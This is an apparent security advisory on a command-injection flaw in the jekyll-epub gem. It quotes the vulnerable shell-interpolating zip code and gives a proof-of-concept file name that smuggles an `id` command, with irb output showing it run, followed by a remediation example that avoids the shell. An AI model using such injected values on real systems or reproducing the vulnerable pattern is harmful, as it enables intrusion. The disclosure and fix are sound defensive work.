Command injection in #{filename} for Jekyll 0.0.3

11/10/2013

Larry W. Cashdollar, @_larry0

http://rubygems.org/gems/jekyll-epub

From https://github.com/glejeune/jekyll-epub/blob/master/lib/jekyll/epub.rb

    # Create the epub file...
    def zip #:nodoc:
      Dir.chdir( self.dest ) do
        # filename comes from the site configuration
        filename = self.config['epub']['name']
        filename += ".epub" unless File.extname(filename) == ".epub"
        $stderr.puts "** Create epub file #{filename} in #{Dir.pwd}..."
        # %x hands the interpolated string to a shell
        %x(zip -X9 \"#{filename}\" mimetype)
        %x(zip -Xr9D \"#{filename}\" * -xi mimetype)
      end
    end
    end # closes the enclosing definition (outside this excerpt)

A filename like foobar\";id;\" gets around the \" quoting: the embedded double quote closes the quoted argument, and the shell that %x starts to run zip executes what follows (here id) as a separate command.

    irb(main):017:0> filename = "test.zip\";id;\""
    => "test.zip\";id;\""
    irb(main):018:0> %x(zip -X9 \"#{filename}\" mimetype)
    sh: 1: : Permission denied
    => "\nzip error: Nothing to do! (test.zip)\nuid=1000(larry) gid=1000(larry) groups=1000(larry),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),106(lpadmin),117(sambashare),119(kismet)\n"
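
One way to close this hole, as an added example that is not code from the advisory or from jekyll-epub: pass the file name as its own argument-vector element so no shell parses it, and validate the configured name first. The names epub_filename, run_without_shell, SAFE_EPUB_NAME and the child-Ruby stand-in for zip are assumptions made for the demonstration.

```ruby
require "open3"
require "rbconfig"

# File name from the advisory's irb session (Ruby string: test.zip";id;")
PAGE_PAYLOAD = "test.zip\";id;\""

# Stand-in for zip (assumption, so the demo runs without zip installed):
# a child Ruby process that prints the argument vector it received.
ARGV_ECHO = [RbConfig.ruby, "-e", "puts ARGV.inspect", "--"].freeze

# Hypothetical allowlist for config['epub']['name']: a bare file name that
# cannot begin with "-" (read as an option) or contain "/" or shell syntax.
SAFE_EPUB_NAME = /\A[A-Za-z0-9_][A-Za-z0-9_.-]*\.epub\z/

# Same ".epub" defaulting as the original method, followed by validation.
def epub_filename(name)
  name = name.to_s
  name += ".epub" unless File.extname(name) == ".epub"
  unless SAFE_EPUB_NAME.match?(name)
    raise ArgumentError, "unsafe epub name: #{name.inspect}"
  end
  name
end

# Argument-vector form: Open3 given several arguments execs the program
# directly, so no shell ever parses the file name.
def run_without_shell(filename, program = ARGV_ECHO)
  out, status = Open3.capture2e(*program, "-X9", filename, "mimetype")
  raise "command failed: #{out}" unless status.success?
  out.strip
end

if __FILE__ == $PROGRAM_NAME
  # The quote and semicolons arrive as literal bytes of one argument.
  puts run_without_shell(PAGE_PAYLOAD)
  begin
    epub_filename(PAGE_PAYLOAD)
  rescue ArgumentError => e
    puts "rejected: #{e.message}"
  end
  puts epub_filename("book")
end
```

Passing ["zip"] as the second argument to run_without_shell runs the real tool the same way.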